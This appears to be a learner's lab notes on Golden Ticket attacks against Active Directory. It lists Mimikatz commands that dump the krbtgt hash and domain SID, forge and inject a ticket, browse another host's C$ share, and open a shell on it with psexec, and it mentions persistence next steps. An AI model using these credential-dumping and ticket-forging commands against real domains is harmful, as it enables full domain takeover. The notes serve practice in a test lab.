Resume
GitHub
LinkedIn
Mail
Trash
Golden Ticket Attacks

What?

  • When we compromise the krbtgt account, we own the domain
  • We can request access to any resources or system on the domain
  • Golden tickets == complete access to every machine

How?

  • Mimikatz
  • use privilege::debug
  • do a lsadump::lsa

What we need for krbtgt account?

  • krbtgt NTLM Hash
  • Domain SID
    Pasted image 20251226203638

With a Golden Ticket, we can now access other machines from the command line

Lab

Step 1:

In the directory where mimikatz.exe is present -> mimikatz.exe

Step 2:

privilege::debug

Step 3:

Get the SID and NTLM hash from -> lsadump::lsa /inject /name:krbtgt

Pasted image 20251227003859

Step 4:

and Finally..

kerberos::golden /User:Administrator /domain:marvel.local /sid:<Paste SID> /krbtgt:<Paste NTLM> /id:500 /ptt

Where,
/User -> can be anything, does not have to be a real user (‘administrator’ is an example here)
/domain -> this has to be a real domain
/sid -> paste the sid of krbtgt here
/krbtgt -> this is the name and after that paste the hash
/id -> RID (relative identifier) 500 is used. An RID 500 account in Windows refers to the built-in Administrator account.
/ptt -> pass the ticket
1. generate a golden ticket
2. pass that ticket to the current session 3. use the ticket to open a command prompt 4. This command prompt can access any computer in the AD

Pasted image 20251227005158

NOW WE HAVE A TICKET SO WE CAN DO SOMETHING LIKE:

Step 5:

misc::cmd

-> this will open a command prompt using the golden ticket in the same session
now we should be able to access any computer
Eg: dir \\THEPUNISHER\c$

Pasted image 20251227010958

-> Download psexec.exe and run it in this cmd -> psexec.exe \\THEPUNISHER cmd.exe -> this gives a shell

What next:

-> make persistance using a golden ticker, like making a domain admin user (NOISY)
-> silver ticket? (golden tickets are less noisy but sometimes they get picked up so a silver ticket can be a useful thing)